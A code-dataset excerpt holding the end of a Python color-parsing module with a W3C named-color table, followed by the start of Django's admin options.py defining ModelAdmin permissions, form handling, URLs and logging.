return Color(*m.groups)
elif m.match(RGBA_PCT_PATTERN, str_):
rgba = tuple([float(each) / 100 * 255 for each in m.groups[:3]] + [m.groups[3]])
return Color(*rgba)
elif m.match(HEX_PATTERN, str_):
rgb = tuple([int(each, 16) for each in m.groups])
return Color(*rgb)
elif m.match(HEX3_PATTERN, str_):
rgb = tuple([int(each * 2, 16) for each in m.groups])
return Color(*rgb)
elif m.match(HSL_PATTERN, str_) or m.match(HSLA_PATTERN, str_):
return Color._from_hsl(*m.groups)
elif str_.upper() in Colors.keys():
return Colors[str_.upper()]
else:
raise ValueError("Could not convert %s into color" % str_)
@staticmethod
def _from_hsl(h, s, l, a=1):
h = float(h) / 360
s = float(s) / 100
l = float(l) / 100
if s == 0:
r = l
g = r
b = r
else:
luminocity2 = l * (1 + s) if l < 0.5 else l + s - l * s
luminocity1 = 2 * l - luminocity2
def hue_to_rgb(lum1, lum2, hue):
if hue < 0.0:
hue += 1
if hue > 1.0:
hue -= 1
if hue < 1.0 / 6.0:
return (lum1 + (lum2 - lum1) * 6.0 * hue)
elif hue < 1.0 / 2.0:
return lum2
elif hue < 2.0 / 3.0:
return lum1 + (lum2 - lum1) * ((2.0 / 3.0) - hue) * 6.0
else:
return lum1
r = hue_to_rgb(luminocity1, luminocity2, h + 1.0 / 3.0)
g = hue_to_rgb(luminocity1, luminocity2, h)
b = hue_to_rgb(luminocity1, luminocity2, h - 1.0 / 3.0)
return Color(r * 256, g * 256, b * 256, a)
def __init__(self, red, green, blue, alpha=1):
self.red = int(red)
self.green = int(green)
self.blue = int(blue)
self.alpha = "1" if float(alpha) == 1 else str(float(alpha) or 0)
@property
def rgb(self):
return "rgb(%d, %d, %d)" % (self.red, self.green, self.blue)
@property
def rgba(self):
return "rgba(%d, %d, %d, %s)" % (self.red, self.green, self.blue, self.alpha)
@property
def hex(self):
return "#%02x%02x%02x" % (self.red, self.green, self.blue)
def __eq__(self, other):
if isinstance(other, Color):
return self.rgba == other.rgba
return NotImplemented
def __ne__(self, other):
result = self.__eq__(other)
if result is NotImplemented:
return result
return not result
def __hash__(self):
return hash((self.red, self.green, self.blue, self.alpha))
def __repr__(self):
return "Color(red=%d, green=%d, blue=%d, alpha=%s)" % (self.red, self.green, self.blue, self.alpha)
def __str__(self):
return "Color: %s" % self.rgba
# Basic, extended and transparent colour keywords as defined by the W3C HTML4 spec
# See http://www.w3.org/TR/css3-color/#html4
Colors = {
"TRANSPARENT": Color(0, 0, 0, 0),
"ALICEBLUE": Color(240, 248, 255),
"ANTIQUEWHITE": Color(250, 235, 215),
"AQUA": Color(0, 255, 255),
"AQUAMARINE": Color(127, 255, 212),
"AZURE": Color(240, 255, 255),
"BEIGE": Color(245, 245, 220),
"BISQUE": Color(255, 228, 196),
"BLACK": Color(0, 0, 0),
"BLANCHEDALMOND": Color(255, 235, 205),
"BLUE": Color(0, 0, 255),
"BLUEVIOLET": Color(138, 43, 226),
"BROWN": Color(165, 42, 42),
"BURLYWOOD": Color(222, 184, 135),
"CADETBLUE": Color(95, 158, 160),
"CHARTREUSE": Color(127, 255, 0),
"CHOCOLATE": Color(210, 105, 30),
"CORAL": Color(255, 127, 80),
"CORNFLOWERBLUE": Color(100, 149, 237),
"CORNSILK": Color(255, 248, 220),
"CRIMSON": Color(220, 20, 60),
"CYAN": Color(0, 255, 255),
"DARKBLUE": Color(0, 0, 139),
"DARKCYAN": Color(0, 139, 139),
"DARKGOLDENROD": Color(184, 134, 11),
"DARKGRAY": Color(169, 169, 169),
"DARKGREEN": Color(0, 100, 0),
"DARKGREY": Color(169, 169, 169),
"DARKKHAKI": Color(189, 183, 107),
"DARKMAGENTA": Color(139, 0, 139),
"DARKOLIVEGREEN": Color(85, 107, 47),
"DARKORANGE": Color(255, 140, 0),
"DARKORCHID": Color(153, 50, 204),
"DARKRED": Color(139, 0, 0),
"DARKSALMON": Color(233, 150, 122),
"DARKSEAGREEN": Color(143, 188, 143),
"DARKSLATEBLUE": Color(72, 61, 139),
"DARKSLATEGRAY": Color(47, 79, 79),
"DARKSLATEGREY": Color(47, 79, 79),
"DARKTURQUOISE": Color(0, 206, 209),
"DARKVIOLET": Color(148, 0, 211),
"DEEPPINK": Color(255, 20, 147),
"DEEPSKYBLUE": Color(0, 191, 255),
"DIMGRAY": Color(105, 105, 105),
"DIMGREY": Color(105, 105, 105),
"DODGERBLUE": Color(30, 144, 255),
"FIREBRICK": Color(178, 34, 34),
"FLORALWHITE": Color(255, 250, 240),
"FORESTGREEN": Color(34, 139, 34),
"FUCHSIA": Color(255, 0, 255),
"GAINSBORO": Color(220, 220, 220),
"GHOSTWHITE": Color(248, 248, 255),
"GOLD": Color(255, 215, 0),
"GOLDENROD": Color(218, 165, 32),
"GRAY": Color(128, 128, 128),
"GREY": Color(128, 128, 128),
"GREEN": Color(0, 128, 0),
"GREENYELLOW": Color(173, 255, 47),
"HONEYDEW": Color(240, 255, 240),
"HOTPINK": Color(255, 105, 180),
"INDIANRED": Color(205, 92, 92),
"INDIGO": Color(75, 0, 130),
"IVORY": Color(255, 255, 240),
"KHAKI": Color(240, 230, 140),
"LAVENDER": Color(230, 230, 250),
"LAVENDERBLUSH": Color(255, 240, 245),
"LAWNGREEN": Color(124, 252, 0),
"LEMONCHIFFON": Color(255, 250, 205),
"LIGHTBLUE": Color(173, 216, 230),
"LIGHTCORAL": Color(240, 128, 128),
"LIGHTCYAN": Color(224, 255, 255),
"LIGHTGOLDENRODYELLOW": Color(250, 250, 210),
"LIGHTGRAY": Color(211, 211, 211),
"LIGHTGREEN": Color(144, 238, 144),
"LIGHTGREY": Color(211, 211, 211),
"LIGHTPINK": Color(255, 182, 193),
"LIGHTSALMON": Color(255, 160, 122),
"LIGHTSEAGREEN": Color(32, 178, 170),
"LIGHTSKYBLUE": Color(135, 206, 250),
"LIGHTSLATEGRAY": Color(119, 136, 153),
"LIGHTSLATEGREY": Color(119, 136, 153),
"LIGHTSTEELBLUE": Color(176, 196, 222),
"LIGHTYELLOW": Color(255, 255, 224),
"LIME": Color(0, 255, 0),
"LIMEGREEN": Color(50, 205, 50),
"LINEN": Color(250, 240, 230),
"MAGENTA": Color(255, 0, 255),
"MAROON": Color(128, 0, 0),
"MEDIUMAQUAMARINE": Color(102, 205, 170),
"MEDIUMBLUE": Color(0, 0, 205),
"MEDIUMORCHID": Color(186, 85, 211),
"MEDIUMPURPLE": Color(147, 112, 219),
"MEDIUMSEAGREEN": Color(60, 179, 113),
"MEDIUMSLATEBLUE": Color(123, 104, 238),
"MEDIUMSPRINGGREEN": Color(0, 250, 154),
"MEDIUMTURQUOISE": Color(72, 209, 204),
"MEDIUMVIOLETRED": Color(199, 21, 133),
"MIDNIGHTBLUE": Color(25, 25, 112),
"MINTCREAM": Color(245, 255, 250),
"MISTYROSE": Color(255, 228, 225),
"MOCCASIN": Color(255, 228, 181),
"NAVAJOWHITE": Color(255, 222, 173),
"NAVY": Color(0, 0, 128),
"OLDLACE": Color(253, 245, 230),
"OLIVE": Color(128, 128, 0),
"OLIVEDRAB": Color(107, 142, 35),
"ORANGE": Color(255, 165, 0),
"ORANGERED": Color(255, 69, 0),
"ORCHID": Color(218, 112, 214),
"PALEGOLDENROD": Color(238, 232, 170),
"PALEGREEN": Color(152, 251, 152),
"PALETURQUOISE": Color(175, 238, 238),
"PALEVIOLETRED": Color(219, 112, 147),
"PAPAYAWHIP": Color(255, 239, 213),
"PEACHPUFF": Color(255, 218, 185),
"PERU": Color(205, 133, 63),
"PINK": Color(255, 192, 203),
"PLUM": Color(221, 160, 221),
"POWDERBLUE": Color(176, 224, 230),
"PURPLE": Color(128, 0, 128),
"RED": Color(255, 0, 0),
"ROSYBROWN": Color(188, 143, 143),
"ROYALBLUE": Color(65, 105, 225),
"SADDLEBROWN": Color(139, 69, 19),
"SALMON": Color(250, 128, 114),
"SANDYBROWN": Color(244, 164, 96),
"SEAGREEN": Color(46, 139, 87),
"SEASHELL": Color(255, 245, 238),
"SIENNA": Color(160, 82, 45),
"SILVER": Color(192, 192, 192),
"SKYBLUE": Color(135, 206, 235),
"SLATEBLUE": Color(106, 90, 205),
"SLATEGRAY": Color(112, 128, 144),
"SLATEGREY": Color(112, 128, 144),
"SNOW": Color(255, 250, 250),
"SPRINGGREEN": Color(0, 255, 127),
"STEELBLUE": Color(70, 130, 180),
"TAN": Color(210, 180, 140),
"TEAL": Color(0, 128, 128),
"THISTLE": Color(216, 191, 216),
"TOMATO": Color(255, 99, 71),
"TURQUOISE": Color(64, 224, 208),
"VIOLET": Color(238, 130, 238),
"WHEAT": Color(245, 222, 179),
"WHITE": Color(255, 255, 255),
"WHITESMOKE": Color(245, 245, 245),
"YELLOW": Color(255, 255, 0),
"YELLOWGREEN": Color(154, 205, 50)
}
| apache-2.0 |
sertac/django | django/contrib/admin/options.py | 126 | 81190 | import copy
import operator
from collections import OrderedDict
from functools import partial, reduce, update_wrapper
from django import forms
from django.conf import settings
from django.contrib import messages
from django.contrib.admin import helpers, widgets
from django.contrib.admin.checks import (
BaseModelAdminChecks, InlineModelAdminChecks, ModelAdminChecks,
)
from django.contrib.admin.exceptions import DisallowedModelAdminToField
from django.contrib.admin.templatetags.admin_static import static
from django.contrib.admin.templatetags.admin_urls import add_preserved_filters
from django.contrib.admin.utils import (
NestedObjects, flatten_fieldsets, get_deleted_objects,
lookup_needs_distinct, model_format_dict, quote, unquote,
)
from django.contrib.auth import get_permission_codename
from django.core.exceptions import (
FieldDoesNotExist, FieldError, PermissionDenied, ValidationError,
)
from django.core.paginator import Paginator
from django.core.urlresolvers import reverse
from django.db import models, router, transaction
from django.db.models.constants import LOOKUP_SEP
from django.db.models.fields import BLANK_CHOICE_DASH
from django.forms.formsets import DELETION_FIELD_NAME, all_valid
from django.forms.models import (
BaseInlineFormSet, inlineformset_factory, modelform_defines_fields,
modelform_factory, modelformset_factory,
)
from django.forms.widgets import CheckboxSelectMultiple, SelectMultiple
from django.http import Http404, HttpResponseRedirect
from django.http.response import HttpResponseBase
from django.template.response import SimpleTemplateResponse, TemplateResponse
from django.utils import six
from django.utils.decorators import method_decorator
from django.utils.encoding import force_text, python_2_unicode_compatible
from django.utils.html import escape, escapejs
from django.utils.http import urlencode
from django.utils.safestring import mark_safe
from django.utils.text import capfirst, get_text_list
from django.utils.translation import string_concat, ugettext as _, ungettext
from django.views.decorators.csrf import csrf_protect
from django.views.generic import RedirectView
IS_POPUP_VAR = '_popup'
TO_FIELD_VAR = '_to_field'
HORIZONTAL, VERTICAL = 1, 2
def get_content_type_for_model(obj):
# Since this module gets imported in the application's root package,
# it cannot import models from other applications at the module level.
from django.contrib.contenttypes.models import ContentType
return ContentType.objects.get_for_model(obj, for_concrete_model=False)
def get_ul_class(radio_style):
return 'radiolist' if radio_style == VERTICAL else 'radiolist inline'
class IncorrectLookupParameters(Exception):
pass
# Defaults for formfield_overrides. ModelAdmin subclasses can change this
# by adding to ModelAdmin.formfield_overrides.
FORMFIELD_FOR_DBFIELD_DEFAULTS = {
models.DateTimeField: {
'form_class': forms.SplitDateTimeField,
'widget': widgets.AdminSplitDateTime
},
models.DateField: {'widget': widgets.AdminDateWidget},
models.TimeField: {'widget': widgets.AdminTimeWidget},
models.TextField: {'widget': widgets.AdminTextareaWidget},
models.URLField: {'widget': widgets.AdminURLFieldWidget},
models.IntegerField: {'widget': widgets.AdminIntegerFieldWidget},
models.BigIntegerField: {'widget': widgets.AdminBigIntegerFieldWidget},
models.CharField: {'widget': widgets.AdminTextInputWidget},
models.ImageField: {'widget': widgets.AdminFileWidget},
models.FileField: {'widget': widgets.AdminFileWidget},
models.EmailField: {'widget': widgets.AdminEmailInputWidget},
}
csrf_protect_m = method_decorator(csrf_protect)
class BaseModelAdmin(six.with_metaclass(forms.MediaDefiningClass)):
"""Functionality common to both ModelAdmin and InlineAdmin."""
raw_id_fields = ()
fields = None
exclude = None
fieldsets = None
form = forms.ModelForm
filter_vertical = ()
filter_horizontal = ()
radio_fields = {}
prepopulated_fields = {}
formfield_overrides = {}
readonly_fields = ()
ordering = None
view_on_site = True
show_full_result_count = True
checks_class = BaseModelAdminChecks
@classmethod
def check(cls, model, **kwargs):
return cls.checks_class().check(cls, model, **kwargs)
def __init__(self):
overrides = FORMFIELD_FOR_DBFIELD_DEFAULTS.copy()
overrides.update(self.formfield_overrides)
self.formfield_overrides = overrides
def formfield_for_dbfield(self, db_field, **kwargs):
"""
Hook for specifying the form Field instance for a given database Field
instance.
If kwargs are given, they're passed to the form Field's constructor.
"""
request = kwargs.pop("request", None)
# If the field specifies choices, we don't need to look for special
# admin widgets - we just need to use a select widget of some kind.
if db_field.choices:
return self.formfield_for_choice_field(db_field, request, **kwargs)
# ForeignKey or ManyToManyFields
if isinstance(db_field, (models.ForeignKey, models.ManyToManyField)):
# Combine the field kwargs with any options for formfield_overrides.
# Make sure the passed in **kwargs override anything in
# formfield_overrides because **kwargs is more specific, and should
# always win.
if db_field.__class__ in self.formfield_overrides:
kwargs = dict(self.formfield_overrides[db_field.__class__], **kwargs)
# Get the correct formfield.
if isinstance(db_field, models.ForeignKey):
formfield = self.formfield_for_foreignkey(db_field, request, **kwargs)
elif isinstance(db_field, models.ManyToManyField):
formfield = self.formfield_for_manytomany(db_field, request, **kwargs)
# For non-raw_id fields, wrap the widget with a wrapper that adds
# extra HTML -- the "add other" interface -- to the end of the
# rendered output. formfield can be None if it came from a
# OneToOneField with parent_link=True or a M2M intermediary.
if formfield and db_field.name not in self.raw_id_fields:
related_modeladmin = self.admin_site._registry.get(db_field.remote_field.model)
wrapper_kwargs = {}
if related_modeladmin:
wrapper_kwargs.update(
can_add_related=related_modeladmin.has_add_permission(request),
can_change_related=related_modeladmin.has_change_permission(request),
can_delete_related=related_modeladmin.has_delete_permission(request),
)
formfield.widget = widgets.RelatedFieldWidgetWrapper(
formfield.widget, db_field.remote_field, self.admin_site, **wrapper_kwargs
)
return formfield
# If we've got overrides for the formfield defined, use 'em. **kwargs
# passed to formfield_for_dbfield override the defaults.
for klass in db_field.__class__.mro():
if klass in self.formfield_overrides:
kwargs = dict(copy.deepcopy(self.formfield_overrides[klass]), **kwargs)
return db_field.formfield(**kwargs)
# For any other type of field, just call its formfield() method.
return db_field.formfield(**kwargs)
def formfield_for_choice_field(self, db_field, request=None, **kwargs):
"""
Get a form Field for a database Field that has declared choices.
"""
# If the field is named as a radio_field, use a RadioSelect
if db_field.name in self.radio_fields:
# Avoid stomping on custom widget/choices arguments.
if 'widget' not in kwargs:
kwargs['widget'] = widgets.AdminRadioSelect(attrs={
'class': get_ul_class(self.radio_fields[db_field.name]),
})
if 'choices' not in kwargs:
kwargs['choices'] = db_field.get_choices(
include_blank=db_field.blank,
blank_choice=[('', _('None'))]
)
return db_field.formfield(**kwargs)
def get_field_queryset(self, db, db_field, request):
"""
If the ModelAdmin specifies ordering, the queryset should respect that
ordering. Otherwise don't specify the queryset, let the field decide
(returns None in that case).
"""
related_admin = self.admin_site._registry.get(db_field.remote_field.model)
if related_admin is not None:
ordering = related_admin.get_ordering(request)
if ordering is not None and ordering != ():
return db_field.remote_field.model._default_manager.using(db).order_by(*ordering)
return None
def formfield_for_foreignkey(self, db_field, request=None, **kwargs):
"""
Get a form Field for a ForeignKey.
"""
db = kwargs.get('using')
if db_field.name in self.raw_id_fields:
kwargs['widget'] = widgets.ForeignKeyRawIdWidget(db_field.remote_field,
self.admin_site, using=db)
elif db_field.name in self.radio_fields:
kwargs['widget'] = widgets.AdminRadioSelect(attrs={
'class': get_ul_class(self.radio_fields[db_field.name]),
})
kwargs['empty_label'] = _('None') if db_field.blank else None
if 'queryset' not in kwargs:
queryset = self.get_field_queryset(db, db_field, request)
if queryset is not None:
kwargs['queryset'] = queryset
return db_field.formfield(**kwargs)
def formfield_for_manytomany(self, db_field, request=None, **kwargs):
"""
Get a form Field for a ManyToManyField.
"""
# If it uses an intermediary model that isn't auto created, don't show
# a field in admin.
if not db_field.remote_field.through._meta.auto_created:
return None
db = kwargs.get('using')
if db_field.name in self.raw_id_fields:
kwargs['widget'] = widgets.ManyToManyRawIdWidget(db_field.remote_field,
self.admin_site, using=db)
kwargs['help_text'] = ''
elif db_field.name in (list(self.filter_vertical) + list(self.filter_horizontal)):
kwargs['widget'] = widgets.FilteredSelectMultiple(
db_field.verbose_name,
db_field.name in self.filter_vertical
)
if 'queryset' not in kwargs:
queryset = self.get_field_queryset(db, db_field, request)
if queryset is not None:
kwargs['queryset'] = queryset
form_field = db_field.formfield(**kwargs)
if isinstance(form_field.widget, SelectMultiple) and not isinstance(form_field.widget, CheckboxSelectMultiple):
msg = _('Hold down "Control", or "Command" on a Mac, to select more than one.')
help_text = form_field.help_text
form_field.help_text = string_concat(help_text, ' ', msg) if help_text else msg
return form_field
def get_view_on_site_url(self, obj=None):
if obj is None or not self.view_on_site:
return None
if callable(self.view_on_site):
return self.view_on_site(obj)
elif self.view_on_site and hasattr(obj, 'get_absolute_url'):
# use the ContentType lookup if view_on_site is True
return reverse('admin:view_on_site', kwargs={
'content_type_id': get_content_type_for_model(obj).pk,
'object_id': obj.pk
})
def get_empty_value_display(self):
"""
Return the empty_value_display set on ModelAdmin or AdminSite.
"""
try:
return mark_safe(self.empty_value_display)
except AttributeError:
return mark_safe(self.admin_site.empty_value_display)
def get_fields(self, request, obj=None):
"""
Hook for specifying fields.
"""
return self.fields
def get_fieldsets(self, request, obj=None):
"""
Hook for specifying fieldsets.
"""
if self.fieldsets:
return self.fieldsets
return [(None, {'fields': self.get_fields(request, obj)})]
def get_ordering(self, request):
"""
Hook for specifying field ordering.
"""
return self.ordering or () # otherwise we might try to *None, which is bad ;)
def get_readonly_fields(self, request, obj=None):
"""
Hook for specifying custom readonly fields.
"""
return self.readonly_fields
def get_prepopulated_fields(self, request, obj=None):
"""
Hook for specifying custom prepopulated fields.
"""
return self.prepopulated_fields
def get_queryset(self, request):
"""
Returns a QuerySet of all model instances that can be edited by the
admin site. This is used by changelist_view.
"""
qs = self.model._default_manager.get_queryset()
# TODO: this should be handled by some parameter to the ChangeList.
ordering = self.get_ordering(request)
if ordering:
qs = qs.order_by(*ordering)
return qs
def lookup_allowed(self, lookup, value):
from django.contrib.admin.filters import SimpleListFilter
model = self.model
# Check FKey lookups that are allowed, so that popups produced by
# ForeignKeyRawIdWidget, on the basis of ForeignKey.limit_choices_to,
# are allowed to work.
for l in model._meta.related_fkey_lookups:
# As ``limit_choices_to`` can be a callable, invoke it here.
if callable(l):
l = l()
for k, v in widgets.url_params_from_lookup_dict(l).items():
if k == lookup and v == value:
return True
relation_parts = []
prev_field = None
for part in lookup.split(LOOKUP_SEP):
try:
field = model._meta.get_field(part)
except FieldDoesNotExist:
# Lookups on non-existent fields are ok, since they're ignored
# later.
break
# It is allowed to filter on values that would be found from local
# model anyways. For example, if you filter on employee__department__id,
# then the id value would be found already from employee__department_id.
if not prev_field or (prev_field.concrete and
field not in prev_field.get_path_info()[-1].target_fields):
relation_parts.append(part)
if not getattr(field, 'get_path_info', None):
# This is not a relational field, so further parts
# must be transforms.
break
prev_field = field
model = field.get_path_info()[-1].to_opts.model
if len(relation_parts) <= 1:
# Either a local field filter, or no fields at all.
return True
clean_lookup = LOOKUP_SEP.join(relation_parts)
valid_lookups = [self.date_hierarchy]
for filter_item in self.list_filter:
if isinstance(filter_item, type) and issubclass(filter_item, SimpleListFilter):
valid_lookups.append(filter_item.parameter_name)
elif isinstance(filter_item, (list, tuple)):
valid_lookups.append(filter_item[0])
else:
valid_lookups.append(filter_item)
return clean_lookup in valid_lookups
def to_field_allowed(self, request, to_field):
"""
Returns True if the model associated with this admin should be
allowed to be referenced by the specified field.
"""
opts = self.model._meta
try:
field = opts.get_field(to_field)
except FieldDoesNotExist:
return False
# Always allow referencing the primary key since it's already possible
# to get this information from the change view URL.
if field.primary_key:
return True
# Allow reverse relationships to models defining m2m fields if they
# target the specified field.
for many_to_many in opts.many_to_many:
if many_to_many.m2m_target_field_name() == to_field:
return True
# Make sure at least one of the models registered for this site
# references this field through a FK or a M2M relationship.
registered_models = set()
for model, admin in self.admin_site._registry.items():
registered_models.add(model)
for inline in admin.inlines:
registered_models.add(inline.model)
related_objects = (
f for f in opts.get_fields(include_hidden=True)
if (f.auto_created and not f.concrete)
)
for related_object in related_objects:
related_model = related_object.related_model
if (any(issubclass(model, related_model) for model in registered_models) and
related_object.field.remote_field.get_related_field() == field):
return True
return False
def has_add_permission(self, request):
"""
Returns True if the given request has permission to add an object.
Can be overridden by the user in subclasses.
"""
opts = self.opts
codename = get_permission_codename('add', opts)
return request.user.has_perm("%s.%s" % (opts.app_label, codename))
def has_change_permission(self, request, obj=None):
"""
Returns True if the given request has permission to change the given
Django model instance, the default implementation doesn't examine the
`obj` parameter.
Can be overridden by the user in subclasses. In such case it should
return True if the given request has permission to change the `obj`
model instance. If `obj` is None, this should return True if the given
request has permission to change *any* object of the given type.
"""
opts = self.opts
codename = get_permission_codename('change', opts)
return request.user.has_perm("%s.%s" % (opts.app_label, codename))
def has_delete_permission(self, request, obj=None):
"""
Returns True if the given request has permission to change the given
Django model instance, the default implementation doesn't examine the
`obj` parameter.
Can be overridden by the user in subclasses. In such case it should
return True if the given request has permission to delete the `obj`
model instance. If `obj` is None, this should return True if the given
request has permission to delete *any* object of the given type.
"""
opts = self.opts
codename = get_permission_codename('delete', opts)
return request.user.has_perm("%s.%s" % (opts.app_label, codename))
def has_module_permission(self, request):
"""
Returns True if the given request has any permission in the given
app label.
Can be overridden by the user in subclasses. In such case it should
return True if the given request has permission to view the module on
the admin index page and access the module's index page. Overriding it
does not restrict access to the add, change or delete views. Use
`ModelAdmin.has_(add|change|delete)_permission` for that.
"""
return request.user.has_module_perms(self.opts.app_label)
@python_2_unicode_compatible
class ModelAdmin(BaseModelAdmin):
"Encapsulates all admin options and functionality for a given model."
list_display = ('__str__',)
list_display_links = ()
list_filter = ()
list_select_related = False
list_per_page = 100
list_max_show_all = 200
list_editable = ()
search_fields = ()
date_hierarchy = None
save_as = False
save_on_top = False
paginator = Paginator
preserve_filters = True
inlines = []
# Custom templates (designed to be over-ridden in subclasses)
add_form_template = None
change_form_template = None
change_list_template = None
delete_confirmation_template = None
delete_selected_confirmation_template = None
object_history_template = None
# Actions
actions = []
action_form = helpers.ActionForm
actions_on_top = True
actions_on_bottom = False
actions_selection_counter = True
checks_class = ModelAdminChecks
def __init__(self, model, admin_site):
self.model = model
self.opts = model._meta
self.admin_site = admin_site
super(ModelAdmin, self).__init__()
def __str__(self):
return "%s.%s" % (self.model._meta.app_label, self.__class__.__name__)
def get_inline_instances(self, request, obj=None):
inline_instances = []
for inline_class in self.inlines:
inline = inline_class(self.model, self.admin_site)
if request:
if not (inline.has_add_permission(request) or
inline.has_change_permission(request, obj) or
inline.has_delete_permission(request, obj)):
continue
if not inline.has_add_permission(request):
inline.max_num = 0
inline_instances.append(inline)
return inline_instances
def get_urls(self):
from django.conf.urls import url
def wrap(view):
def wrapper(*args, **kwargs):
return self.admin_site.admin_view(view)(*args, **kwargs)
wrapper.model_admin = self
return update_wrapper(wrapper, view)
info = self.model._meta.app_label, self.model._meta.model_name
urlpatterns = [
url(r'^$', wrap(self.changelist_view), name='%s_%s_changelist' % info),
url(r'^add/$', wrap(self.add_view), name='%s_%s_add' % info),
url(r'^(.+)/history/$', wrap(self.history_view), name='%s_%s_history' % info),
url(r'^(.+)/delete/$', wrap(self.delete_view), name='%s_%s_delete' % info),
url(r'^(.+)/change/$', wrap(self.change_view), name='%s_%s_change' % info),
# For backwards compatibility (was the change url before 1.9)
url(r'^(.+)/$', wrap(RedirectView.as_view(
pattern_name='%s:%s_%s_change' % ((self.admin_site.name,) + info)
))),
]
return urlpatterns
def urls(self):
return self.get_urls()
urls = property(urls)
@property
def media(self):
extra = '' if settings.DEBUG else '.min'
js = [
'core.js',
'admin/RelatedObjectLookups.js',
'vendor/jquery/jquery%s.js' % extra,
'jquery.init.js',
'actions%s.js' % extra,
'urlify.js',
'prepopulate%s.js' % extra,
'vendor/xregexp/xregexp.min.js',
]
return forms.Media(js=[static('admin/js/%s' % url) for url in js])
def get_model_perms(self, request):
"""
Returns a dict of all perms for this model. This dict has the keys
``add``, ``change``, and ``delete`` mapping to the True/False for each
of those actions.
"""
return {
'add': self.has_add_permission(request),
'change': self.has_change_permission(request),
'delete': self.has_delete_permission(request),
}
def get_fields(self, request, obj=None):
if self.fields:
return self.fields
form = self.get_form(request, obj, fields=None)
return list(form.base_fields) + list(self.get_readonly_fields(request, obj))
def get_form(self, request, obj=None, **kwargs):
"""
Returns a Form class for use in the admin add view. This is used by
add_view and change_view.
"""
if 'fields' in kwargs:
fields = kwargs.pop('fields')
else:
fields = flatten_fieldsets(self.get_fieldsets(request, obj))
if self.exclude is None:
exclude = []
else:
exclude = list(self.exclude)
readonly_fields = self.get_readonly_fields(request, obj)
exclude.extend(readonly_fields)
if self.exclude is None and hasattr(self.form, '_meta') and self.form._meta.exclude:
# Take the custom ModelForm's Meta.exclude into account only if the
# ModelAdmin doesn't define its own.
exclude.extend(self.form._meta.exclude)
# if exclude is an empty list we pass None to be consistent with the
# default on modelform_factory
exclude = exclude or None
# Remove declared form fields which are in readonly_fields.
new_attrs = OrderedDict(
(f, None) for f in readonly_fields
if f in self.form.declared_fields
)
form = type(self.form.__name__, (self.form,), new_attrs)
defaults = {
"form": form,
"fields": fields,
"exclude": exclude,
"formfield_callback": partial(self.formfield_for_dbfield, request=request),
}
defaults.update(kwargs)
if defaults['fields'] is None and not modelform_defines_fields(defaults['form']):
defaults['fields'] = forms.ALL_FIELDS
try:
return modelform_factory(self.model, **defaults)
except FieldError as e:
raise FieldError('%s. Check fields/fieldsets/exclude attributes of class %s.'
% (e, self.__class__.__name__))
def get_changelist(self, request, **kwargs):
"""
Returns the ChangeList class for use on the changelist page.
"""
from django.contrib.admin.views.main import ChangeList
return ChangeList
def get_object(self, request, object_id, from_field=None):
"""
Returns an instance matching the field and value provided, the primary
key is used if no field is provided. Returns ``None`` if no match is
found or the object_id fails validation.
"""
queryset = self.get_queryset(request)
model = queryset.model
field = model._meta.pk if from_field is None else model._meta.get_field(from_field)
try:
object_id = field.to_python(object_id)
return queryset.get(**{field.name: object_id})
except (model.DoesNotExist, ValidationError, ValueError):
return None
def get_changelist_form(self, request, **kwargs):
"""
Returns a Form class for use in the Formset on the changelist page.
"""
defaults = {
"formfield_callback": partial(self.formfield_for_dbfield, request=request),
}
defaults.update(kwargs)
if (defaults.get('fields') is None
and not modelform_defines_fields(defaults.get('form'))):
defaults['fields'] = forms.ALL_FIELDS
return modelform_factory(self.model, **defaults)
def get_changelist_formset(self, request, **kwargs):
"""
Returns a FormSet class for use on the changelist page if list_editable
is used.
"""
defaults = {
"formfield_callback": partial(self.formfield_for_dbfield, request=request),
}
defaults.update(kwargs)
return modelformset_factory(self.model,
self.get_changelist_form(request), extra=0,
fields=self.list_editable, **defaults)
def get_formsets_with_inlines(self, request, obj=None):
"""
Yields formsets and the corresponding inlines.
"""
for inline in self.get_inline_instances(request, obj):
yield inline.get_formset(request, obj), inline
def get_paginator(self, request, queryset, per_page, orphans=0, allow_empty_first_page=True):
return self.paginator(queryset, per_page, orphans, allow_empty_first_page)
def log_addition(self, request, object, message):
"""
Log that an object has been successfully added.
The default implementation creates an admin LogEntry object.
"""
from django.contrib.admin.models import LogEntry, ADDITION
LogEntry.objects.log_action(
user_id=request.user.pk,
content_type_id=get_content_type_for_model(object).pk,
object_id=object.pk,
object_repr=force_text(object),
action_flag=ADDITION,
change_message=message,
)
def log_change(self, request, object, message):
"""
Log that an object has been successfully changed.
The default implementation creates an admin LogEntry object.
"""
from django.contrib.admin.models import LogEntry, CHANGE
LogEntry.objects.log_action(
user_id=request.user.pk,
content_type_id=get_content_type_for_model(object).pk,
object_id=object.pk,
object_repr=force_text(object),
action_flag=CHANGE,
change_message=message,
)
def log_deletion(self, request, object, object_repr):
"""
Log that an object will be deleted. Note that this method must be
called before the deletion.
The default implementation creates an admin LogEntry object.
"""
from django.contrib.admin.models import LogEntry, DELETION
LogEntry.objects.log_action(
user_id=request.user.pk,
content_type_id=get_content_type_for_model(object).pk,
object_id=object.pk,
object_repr=object_repr,
action_flag=DELETION,
)
def action_checkbox(self, obj):
"""
A list_display column containing a checkbox widget.
"""
return helpers.checkbox.render(helpers.ACTION_CHECKBOX_NAME, force_text(obj.pk))
action_checkbox.short_description = mark_safe('<input type="checkbox" id="action-toggle" />')
action_checkbox.allow_tags = True
def get_actions(self, request):
"""
Return a dictionary mapping the names of all actions for this
ModelAdmin to a tuple of (callable, name, description) for each action.
"""
# If self.actions is explicitly set to None that means that we don't
# want *any* actions enabled on this page.
if self.actions is None or IS_POPUP_VAR in request.GET:
return OrderedDict()
actions = []
# Gather actions from the admin site first
for (name, func) in self.admin_site.actions:
description = getattr(func, 'short_description', name.replace('_', ' '))
actions.append((func, name, description))
# Then gather them from the model admin and all parent classes,
# starting with self and working back up.
for klass in self.__class__.mro()[::-1]:
class_actions = getattr(klass, 'actions', [])
# Avoid trying to iterate over None
if not class_actions:
continue
actions.extend(self.get_action(action) for action in class_actions)
# get_action might have returned None, so filter any of those out.
actions = filter(None, actions)
# Convert the actions into an OrderedDict keyed by name.
actions = OrderedDict(
(name, (func, name, desc))
for func, name, desc in actions
)
return actions
def get_action_choices(self, request, default_choices=BLANK_CHOICE_DASH):
"""
Return a list of choices for use in a form object. Each choice is a
tuple (name, description).
"""
choices = [] + default_choices
for func, name, description in six.itervalues(self.get_actions(request)):
choice = (name, description % model_format_dict(self.opts))
choices.append(choice)
return choices
def get_action(self, action):
"""
Return a given action from a parameter, which can either be a callable,
or the name of a method on the ModelAdmin. Return is a tuple of
(callable, name, description).
